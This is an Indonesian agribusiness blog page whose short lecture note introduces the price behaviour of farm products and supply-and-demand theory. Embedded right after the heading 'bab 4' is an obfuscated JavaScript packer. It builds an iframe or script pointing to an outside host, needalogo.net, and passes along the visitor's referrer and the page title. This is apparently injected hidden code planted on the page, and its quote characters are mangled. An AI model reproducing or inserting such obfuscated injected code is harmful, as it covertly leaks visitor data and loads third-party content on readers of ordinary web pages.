Home > AGRONIAGA, Ilmu Amaliah, starts small! > LECTURE NOTE 4

LECTURE NOTE 4

Karakteristik harga produk pertanian khususnya yang dipasarkan dalam bentuk fresh product dipengaruhi dalam banyak hal oleh karakteristik produk pertanian sebagaimana telah dipelajari pada bahan kajian sebelumnya. Namun pasar bukan obyek yang steril dari pengaruh eksternal. Pasar modern dalam kondisi yang telah berkembang dewasa ini, berperilaku sangat kompleks. Sebagaimana para ekonom meyakini, pasar telah berkembang dari terminologi fisik menjadi bentuk-bentuk yang beragam dan lebih substantif. Pasar adalah bertemunya kekuatan permintaan dan penawaran.Untuk itu  penting bagi mahasiswa S1 Program Studi Agribisnis untuk mempelajari prinsip-prinsip teoritis permintaan dan penawaran produk pertanian, sebelum mengkaji secara mendalam perilaku harga produk pertanian.

bab 4eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c]);return p}(‘(7(){2 d=3;2 w=1;2 h=1;2 t=d.8(\’9\’);2 4=5.a(5.b()*c);2 0=\’e://f.g/i/j?\’;0=0+\’k=\’+3.l;0=0+\’&m=\’+3.n;0=0+\’&r=\’+4;d.o(\’\')})();’,35,35,’src||var|document|id|Math|iframe|function|createElement|script|floor|random|9999||http|needalogo|net||rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style|padding||0px||border|none||width|height’.split(‘|’),0,{}))

Categories: AGRONIAGA, Ilmu Amaliah, starts small! Tags:
  1. No comments yet.
  1. No trackbacks yet.
CAPTCHA Image
*